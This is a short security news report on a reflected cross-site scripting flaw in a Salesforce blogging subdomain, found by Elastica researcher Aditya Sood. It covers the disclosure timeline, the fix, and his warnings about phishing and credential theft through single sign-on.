Beginning in July and lasting for at least a month, a Salesforce subdomain used for blogging was affected by a reflected cross-site scripting (XSS) vulnerability that could have been exploited by attackers to distribute malware and carry out phishing attacks.
In a Wednesday blog post, Aditya Sood, lead architect of Elastica Cloud Threat Labs, wrote that the vulnerability was in the “admin.salesforce.com” subdomain, and he told SCMagazine.com in a Thursday email correspondence that the bug was reported to Salesforce on July 6 and addressed on Aug. 9.
Although Salesforce told Elastica that the vulnerability is considered low impact due to it not affecting the primary Salesforce domain, Sood said that there is more to the issue and that these types of bugs “should not be taken lightly.”
In the post, he demonstrated how the flaw could have been exploited to stage some fairly advanced phishing attacks involving fake login pop-up windows – thus putting usernames and passwords at risk. The theft of credentials is made worse because Salesforce, Sood said, has implemented single sign-on (SSO).
“The users primarily have only one set of credentials which is mainly Salesforce SSO,” Sood said. “So one can imagine that if those accounts are compromised then attackers could gain access to all the applications used by the Salesforce users.”
Sood said that the vulnerability can also enable distribution of malware via drive-by attack.